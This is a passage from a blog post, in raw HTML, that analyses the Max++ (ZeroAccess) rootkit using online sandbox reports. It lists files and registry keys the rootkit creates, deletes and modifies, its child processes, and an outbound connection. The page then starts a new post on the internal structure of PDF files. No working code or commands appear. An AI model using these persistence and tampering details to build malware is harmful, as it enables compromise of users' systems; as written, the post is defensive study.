</span></span></div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="font-size: 11pt; margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSuBPNHXhDk9M01yZGidgnaxE15k2iObIVW88abu5XZmyUDRZTlL5iGwZQNza7G5DbdHpQVYSxlJzstH1Vs0yOpLJUAWtJarAJ7XRZ-QUHT8qLmaLunxIRAaGpx0x_BHsQG4fScfPT_wPK/s1600/Figure+1-8.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSuBPNHXhDk9M01yZGidgnaxE15k2iObIVW88abu5XZmyUDRZTlL5iGwZQNza7G5DbdHpQVYSxlJzstH1Vs0yOpLJUAWtJarAJ7XRZ-QUHT8qLmaLunxIRAaGpx0x_BHsQG4fScfPT_wPK/s400/Figure+1-8.png" width="317" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.8 - Other names that have been associated with the same malware by VirusTotal</td></tr>
</tbody></table><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;"><br />
</span></span></div><div style="text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="line-height: 115%;"><span style="font-size: large;"><b>3.2 GWISandbox Results for Max++</b></span></span></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;">I submitted the Max++ executable to GWISandbox and below are the results for my submission. GWISandbox actually runs the file in a remote isolated environment and is able to give you a quick analysis of the infected system.</span></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><i><span style="font-size: 11pt; line-height: 115%;"><br />
</span></i></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><i><span style="font-size: 11pt; line-height: 115%;">Figure 1.9</span></i><span style="font-size: 11pt; line-height: 115%;"> shows the analysis summary returned by GWISandbox. The MD5 hash is provided for the file as well as the size and number of processes it starts on the system. The type of sandbox system is returned and in this analysis the malware was executed on a system with the Windows XP Service Pack 3. The number of processes that are run by Max++ is 3. Later in the detailed report of Annubis we are also given the name of the specific processes and the files they create, delete and modify. On the second table in <i>Figure 1.</i>9, the digital behavior traits section gives us an overview of the actions taken by the malware. The Max++ malware spawns new services, deletes the original executable, injects code, and modifies files and registries on the infected system.</span></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;"><br />
</span></span></div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="font-size: 11pt; margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiv1tgbhz9VXM0ifvucerxTRPQiOb2MEK8gADCs_pAzOH6cD29WmV_2JxMTZlYqwe7Fo3cv577OVmKvZ4dA4iuqj-oiHHXrT7f8-jcjEp47ygj0YE_XGM3va38VQsZv-LRboZlNDBP0qw7i/s1600/Figure+1-9.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="483" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiv1tgbhz9VXM0ifvucerxTRPQiOb2MEK8gADCs_pAzOH6cD29WmV_2JxMTZlYqwe7Fo3cv577OVmKvZ4dA4iuqj-oiHHXrT7f8-jcjEp47ygj0YE_XGM3va38VQsZv-LRboZlNDBP0qw7i/s640/Figure+1-9.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.9 - Analysis summary provided by GWISandbox</td></tr>
</tbody></table><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;"><br />
</span></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;">Included in the report we have the files that are deleted by the malware. Figure 1.10 shows us that the original executable file is deleted by the same process.</span></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;"><br />
</span></span></div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="font-size: 11pt; margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqxFkM2EJmxFyZRc7TCNCuNwVhyARQ8wqECggmhfFYRfRPskiR6WLdcnFjIKDMexh8wIV7i0e1EMfCyvC6bS3bFOSgYNFmNH7lnr3wVc3DAZLuZfNPEfRU8w5RW4RCvT40Xapr-lslof1S/s1600/Figure+1-10.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="52" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqxFkM2EJmxFyZRc7TCNCuNwVhyARQ8wqECggmhfFYRfRPskiR6WLdcnFjIKDMexh8wIV7i0e1EMfCyvC6bS3bFOSgYNFmNH7lnr3wVc3DAZLuZfNPEfRU8w5RW4RCvT40Xapr-lslof1S/s640/Figure+1-10.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.10 - GWISandbox report of files deleted by the Max++ executable</td></tr>
</tbody></table><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="font-size: 11pt; margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmQcmg46TKvKHLR2AXwfmRtBPnOnx30EjHVt3kDbix0Z7gn3KEqBdtfOvkO4d0gQnVjsbDa0yPjxZEMmjjq-8N-0682Qa1vde_nuQPCbuqD3Ehw29tPqsGna8jMBtsYjsyrBAq06L44c_R/s1600/Figure+1-11.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="90" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmQcmg46TKvKHLR2AXwfmRtBPnOnx30EjHVt3kDbix0Z7gn3KEqBdtfOvkO4d0gQnVjsbDa0yPjxZEMmjjq-8N-0682Qa1vde_nuQPCbuqD3Ehw29tPqsGna8jMBtsYjsyrBAq06L44c_R/s640/Figure+1-11.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.11 - GWISandbox report of files created and modified by Max++ executable</td></tr>
</tbody></table><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;"><br />
</span></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;">Not only does the Max++ remove the original file that infects the system, it also creates and modifies files in the windows system folders. Specifically we can see in <i>Figure 1.11</i> that three files are created in the Windows system32 folder. “afd.sys” and “afd.sys.new” is added to the drivers folder. “afd.sys.new” is also added to the “dllcache” folder in windows as well.</span></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;"><br />
</span></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;">GWISandbox also presents us with the registry values that are set by the malware. Below in <i>Figure 1.12</i> four modifications are performed. The first three modify a registry in the “ControlSet001” folder. It appears to add its own service “afd”, which we saw previously that Max++ created this file, to start on system boot. The fourth modification is to a registry for the <i>Internet Explorer</i> browser. This will most likely make browsing in <i>Internet Explorer</i> insecure. Also in <i>Figure 1.</i>12, under the network traffic table, we can see a connection is made by the malware to a remote IP “10.20.25.255”.</span></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><br />
</span></div><div class="separator" style="clear: both; font-size: 11pt; text-align: center;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuN8r4F_IT8G85La9OlbawGgnxUMUrdFF-a0BvpGfD6hilGYctX45oc4ME9yAB16deSmrJD1YsGyqzcwEBXpctW_bJ_FLj4V87Lu2Ec-4pVz1rtbjyffICfAJesZkrj4L5nyfHb0nuzOmk/s1600/Figure+1-12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="210" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuN8r4F_IT8G85La9OlbawGgnxUMUrdFF-a0BvpGfD6hilGYctX45oc4ME9yAB16deSmrJD1YsGyqzcwEBXpctW_bJ_FLj4V87Lu2Ec-4pVz1rtbjyffICfAJesZkrj4L5nyfHb0nuzOmk/s640/Figure+1-12.png" width="640" /></a></span></div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="font-size: 11pt; margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLeKVWbmR3IVX9IQrCgqUQv3jzpBfLFV8QJ-GWQ7Rfng5Wlkvp6gQDYNJzuKDswA5A8mZNp9US5hwBrCFFlqeIuupiICOWsOS-0r0H1V3Gokoyi6yMwkQkXOcS2mJbL7Vcd5xodnlhAWG_/s1600/Figure+1-12+2.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="72" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLeKVWbmR3IVX9IQrCgqUQv3jzpBfLFV8QJ-GWQ7Rfng5Wlkvp6gQDYNJzuKDswA5A8mZNp9US5hwBrCFFlqeIuupiICOWsOS-0r0H1V3Gokoyi6yMwkQkXOcS2mJbL7Vcd5xodnlhAWG_/s640/Figure+1-12+2.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.12 - GWISandbox report of registry files modified and network conections made by Max++</td></tr>
</tbody></table><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;"><br />
</span></span></div><div style="text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: large;"><b>3.3 Annubis Results for Max++</b></span></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;">Among the three online services to submit a malware sample and receive an analysis, I found Annubis to be the most complete and detailed report. The full report is extensive and I will only discuss a portion of the results in this section.</span></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;"><br />
</span></span></div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="font-size: 11pt; margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0xBnhhBdXsLvOq2Re2cg3B4p8g3IyazVYtUULKXFZ0Xnp44pUBWBVL5I7KSoDDu3Q1IvaMXAg8EMz5LHCi-mKcZhi14hElu6WFItq_KY_LVj9mDUjAncE-ERTIjrR3_iB6ksySzh9IcaE/s1600/Figure+1-13.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="168" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0xBnhhBdXsLvOq2Re2cg3B4p8g3IyazVYtUULKXFZ0Xnp44pUBWBVL5I7KSoDDu3Q1IvaMXAg8EMz5LHCi-mKcZhi14hElu6WFItq_KY_LVj9mDUjAncE-ERTIjrR3_iB6ksySzh9IcaE/s640/Figure+1-13.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.13 - Annubis analysis summary for Max++ executable</td></tr>
</tbody></table><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;"><br />
</span></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;">The analysis summary of the report from Annubis can be seen in <i>Figure 1.13</i>. We are given a description of the actions Max++ performs as well as the risk, which is color coded and ranges from low to high risk. The first behavior observed by Annubis is that Max++ changes the security settings of Internet Explorer. This is supported by the GWISandbox analysis which reported a registry in the <i>Internet Explorer</i> folder had been modified. In Annubis this change is identified as a medium risk to the system. Annubis also reports that Max++ creates, modifies, and deletes files from the computer. It is classified as a high risk to the system. As seen by the GWISandbox report we know the original malware file is deleted and other files are added to the system folder. Also we know three processes are run by the Max++ executable and Annubis reports the same here. The last behavior observed is related to the registers that are read, created, modified and monitored by the malware. Annubis reports this behavior as a low risk to the system.</span></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;"><br />
</span></span></div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="font-size: 11pt; margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFVDZ_TI6K7HNbDj-2WCBunx9z9T7TsFSS4Qa9U9kc9CNCw7gaeAMsh87EzNc_9EqAuD9cYcRxvgNfUPWfGkEgl0KDBn3cqGeiHZRH3cqix4PvtxunolUn4cHV4BCiBv_o26EWVmVyOuZL/s1600/Figure+1-14.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="212" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFVDZ_TI6K7HNbDj-2WCBunx9z9T7TsFSS4Qa9U9kc9CNCw7gaeAMsh87EzNc_9EqAuD9cYcRxvgNfUPWfGkEgl0KDBn3cqGeiHZRH3cqix4PvtxunolUn4cHV4BCiBv_o26EWVmVyOuZL/s640/Figure+1-14.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.14 - Annubis analysis of modules loaded at execution of Max++</td></tr>
</tbody></table><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;"><br />
</span></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;">From Annubis we can also tell which modules are loaded at runtime of the Max++ malware. In <i>Figure 1.14</i> we have a list of the loaded dll’s. Among them is “ntdll.dll” and we will later see, using a debugger, how the malware searches for this driver and creates its own functions to perform.</span></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;"><br />
</span></span></div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="font-size: 11pt; margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8p2xkSQNSTzVG4YdNx_bTRiABtnN9Sp-WnObr9EOe-65zAvRuYSKJfSmrtUzSiLLVdRHLgZNoSbfqb3-JPYEaMXVBJNKVZJQu0ODOLk_sbD-6JSJOC3IUQzKxabVFfXMKX8lw9uJNs8WA/s1600/Figure+1-15.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="190" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8p2xkSQNSTzVG4YdNx_bTRiABtnN9Sp-WnObr9EOe-65zAvRuYSKJfSmrtUzSiLLVdRHLgZNoSbfqb3-JPYEaMXVBJNKVZJQu0ODOLk_sbD-6JSJOC3IUQzKxabVFfXMKX8lw9uJNs8WA/s640/Figure+1-15.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.15 - Annubis analysis of the file activity for the Max++ primary process</td></tr>
</tbody></table><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;"><br />
</span></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;">As we have seen from the initial summary by Annubis, three processes are executed by the malware. In <i>Figure 1.15</i> we see file activity from the main process of Max++. The file “appcompat.txt” is created in a temporary folder. Also the main process reads data from the driver “winsock.dll”.</span></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;"><br />
</span></span></div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="font-size: 11pt; margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFv9BaqgBB_49TtO6MhqMx77mhau3xylX1c8XvKrtFdXUCS57Rma4JcGZmH52RDS6iGads0rbOD8HMpoa5c15b_I2xGzit5dk7-1EIQo3iWglVlJ8y0a0YTB2PIKfAT9OX4Pq7EjKjm2Dx/s1600/Figure+1-16.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="108" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFv9BaqgBB_49TtO6MhqMx77mhau3xylX1c8XvKrtFdXUCS57Rma4JcGZmH52RDS6iGads0rbOD8HMpoa5c15b_I2xGzit5dk7-1EIQo3iWglVlJ8y0a0YTB2PIKfAT9OX4Pq7EjKjm2Dx/s640/Figure+1-16.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.16 - Anubis analysis of processes started by the Max++ malware</td></tr>
</tbody></table><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;"><br />
</span></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;">In Figure 1.16 we have a list of the new processes that are started besides the main process of Max++. Specifically, “dwwin.exe” and “drwtsn32” are two processes that are started by the malware. In comparison to GWISandbox, Annubis allows us to see not only the changes that are made by the main process of Max++, but the changes that are made by the child processes as well.</span></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;"><br />
</span></span></div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="font-size: 11pt; margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgo8EhQApSGGZae45uRgki-dVSMRgJnaPuxNuVriAPhG5-VxhDJmjzK0Y1m5Pk2aBfLjpJ7RsFjJtXbYGeBl5CI1Bx4aslqP7PP98ilUG-3IicwWabb-vDv043nC4Qz9WkJ1WOFfx4URzEs/s1600/Figure+1-17.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="556" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgo8EhQApSGGZae45uRgki-dVSMRgJnaPuxNuVriAPhG5-VxhDJmjzK0Y1m5Pk2aBfLjpJ7RsFjJtXbYGeBl5CI1Bx4aslqP7PP98ilUG-3IicwWabb-vDv043nC4Qz9WkJ1WOFfx4URzEs/s640/Figure+1-17.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.17 - Annubis Max++ analysis of registry modifications due to the dwwin process</td></tr>
</tbody></table><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;"><br />
</span></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;">The process dwwin.exe is started by Max++ and <i>Figure 1.17</i> displays all the registry modifications that are made by this child process. We are able to see the registry keys and new values that are created for each element. All the registries that are modified by this process have to deal with Internet Explorer and are likely crippling the security features of the browser.</span></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;"><br />
</span></span></div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="font-size: 11pt; margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZc4W57n47B9ICqgdny96NXK6qDy5sABPAOkszGmQARAe-2dHiNI1fHgap2xVBJ-WZNef9hmZa__C-R3mwz1avmjICWJ7GTQYHMYQ9o6cSYQp6frlSf7N8iDXI7VEK3lpDR_neDdSpCims/s1600/Figure+1-18.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="120" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZc4W57n47B9ICqgdny96NXK6qDy5sABPAOkszGmQARAe-2dHiNI1fHgap2xVBJ-WZNef9hmZa__C-R3mwz1avmjICWJ7GTQYHMYQ9o6cSYQp6frlSf7N8iDXI7VEK3lpDR_neDdSpCims/s640/Figure+1-18.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.18 - Annubis Max++ analysis of file activity by dwwin process</td></tr>
</tbody></table><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;"><br />
</span></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;">In <i>Figure 1.18</i> Annubis gives us the files modified by the “drwtsn” process. We have one dump file “7B563.dmp” that is created and later deleted from the temporary folder of the system. Also another file is deleted, “9ad1_appcompat.txt”. This information that was not presented by GWISandbox in the report it generated.</span></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;"><br />
</span></span></div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="font-size: 11pt; margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdSPykTeR7UghGSSCp3Zhq4uG_qm5jHtFvFKctxQSKxB-K-VzsaKMBV0OnRLXdv9iFjvrA2HyBOMpXrwqK6wiZZNicjBYHeevg0GRYS8BCJ6ssLBTT6W4La4GzK-sCLP-tOrLjyB2vQEjG/s1600/Figure+1-19.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="88" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdSPykTeR7UghGSSCp3Zhq4uG_qm5jHtFvFKctxQSKxB-K-VzsaKMBV0OnRLXdv9iFjvrA2HyBOMpXrwqK6wiZZNicjBYHeevg0GRYS8BCJ6ssLBTT6W4La4GzK-sCLP-tOrLjyB2vQEjG/s640/Figure+1-19.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.19 - Annubis Max++ analysis of registry values modified by drwtsn process</td></tr>
</tbody></table><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;"><br />
</span></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;">A second process, “drwtsn”, is started by the Max++ executable. <i>Figure 1.19</i> displays the registry changes that are made by this child process. “drwtsn” is a system file that is part of the windows operating system. The file is normally located in “C:\windows” or “C:\windows\system32”, however, malware is known to disguise as this system file [2]. Also in <i>Figure 1.20</i> we have all the file changes performed by the “drwtsn” process. A new folder is created labeled “Dr Watson” and this folder is installed under the Microsoft directory. Here the executable, log, and dump file are created. The process also accesses information stored on the original Max++ executable file. Annubis also provides us with the file system control communication and the device control communication. The file “isarpc” is accessed three times, and the file “ksecDD” is accessed eight times in the Annubis analysis.</span></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;"><br />
</span></span></div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="font-size: 11pt; margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNdMih6FK_tl4aDf0mW3IRCuD42hxH_GpRWrWXwfZQiGZhQGcHstsmHmagJeanA-nUcTZRAzt7CNmD9f2grhGCCHbkq3i4YvUizaKGfkdkLjZJTyKxbXQCeyB8ZyB5iO52RakuMHlk7mpl/s1600/Figure+1-20.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="448" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNdMih6FK_tl4aDf0mW3IRCuD42hxH_GpRWrWXwfZQiGZhQGcHstsmHmagJeanA-nUcTZRAzt7CNmD9f2grhGCCHbkq3i4YvUizaKGfkdkLjZJTyKxbXQCeyB8ZyB5iO52RakuMHlk7mpl/s640/Figure+1-20.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.20 - Annubis Max++ analysis of file activity by drwtsn process</td></tr>
</tbody></table><div style="text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="line-height: 115%;"><span style="font-size: large;"><b>4. Conclusion</b></span></span></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;">To briefly summarize this section, Max++ is an advanced rootkit that creates, modifies, and deletes files/registries on a computer without the users consent. It opens network connections and the penetration of Max++ is extensive. I have presented several malware analyses from web services online and have presented the changes they report on an infected system. I will continue to delve into the code of the Max++ rootkit and analyze an anti-debugging technique frequently used by this malware.</span></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;"><br />
</span></span></div><div style="text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="line-height: 115%;"><span style="font-size: large;"><b>5. References</b></span></span></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;">[1] Dr. Xiang Fu, Malware Analysis Tutorial 1: VM Based Analysis Platform, Available at</span></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;"> <a href="http://fumalwareanalysis.blogspot.com/2011_10_01_archive.html">http://fumalwareanalysis.blogspot.com/2011_10_01_archive.html</a></span></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;">[2] Guiseppe Bonfa, "Step-by-Step Reverse Engineering Malware: ZeroAccess / Max ++ / Smiscer </span></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;"> Crimeware Rootkit", Available at <a href="http://resources.infosecinstitute.com/step-by-step-tutorial-on-reverse-engineering-malware-the-zeroaccessMaxsmiscer-crimeware-rootkit/" target="_blank">http://resources.infosecinstitute.com/step-by-step-tutorial-on-</a></span></span></div><div style="font-size: 11pt; text-align: justify;"><span style="font-family: Calibri, sans-serif; line-height: 115%;"><span style="font-size: 11pt; line-height: 115%;"> <a href="http://resources.infosecinstitute.com/step-by-step-tutorial-on-reverse-engineering-malware-the-zeroaccessMaxsmiscer-crimeware-rootkit/" target="_blank">reverse-engineering-malware-the-zeroaccessMaxsmiscer-crimeware-rootkit/</a></span></span></div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8501561183307667545.post-62139918202217035312012-02-19T12:26:00.000-08:002012-02-19T20:59:29.069-08:00How to Manually Create a PDFThe Portable Document Format (PDF) was a proprietary format controlled by Adobe until July 1, 2008 when the open standard was released to the public. It is independent of software, hardware, and operating system and this format is commonly used for document exchange. One topic for a later discussion is the utilization of PDF’s to embed malicious code and run on an unsuspecting computer. First let us concentrate on the different sections of a PDF and how to create a document manually.<br />
<div class="MsoNormal"><br />
<div class="MsoNormal"><br />
</div><div class="MsoNormal">A PDF is a file that consists of several objects. In general you have four parts to a PDF file structure.<o:p></o:p></div><div class="MsoNormal"></div><ol><li>The <b>header</b> states the PDF specification that this file follows</li>
<li>The <b>body</b> contains all the objects that make up the document</li>
<li>The <b>cross-reference table</b> list the locations of the indirect objects in the file</li>
<li>The <b>trailer</b> specifies the location of the cross reference table and other special objects</li>
</ol><br />
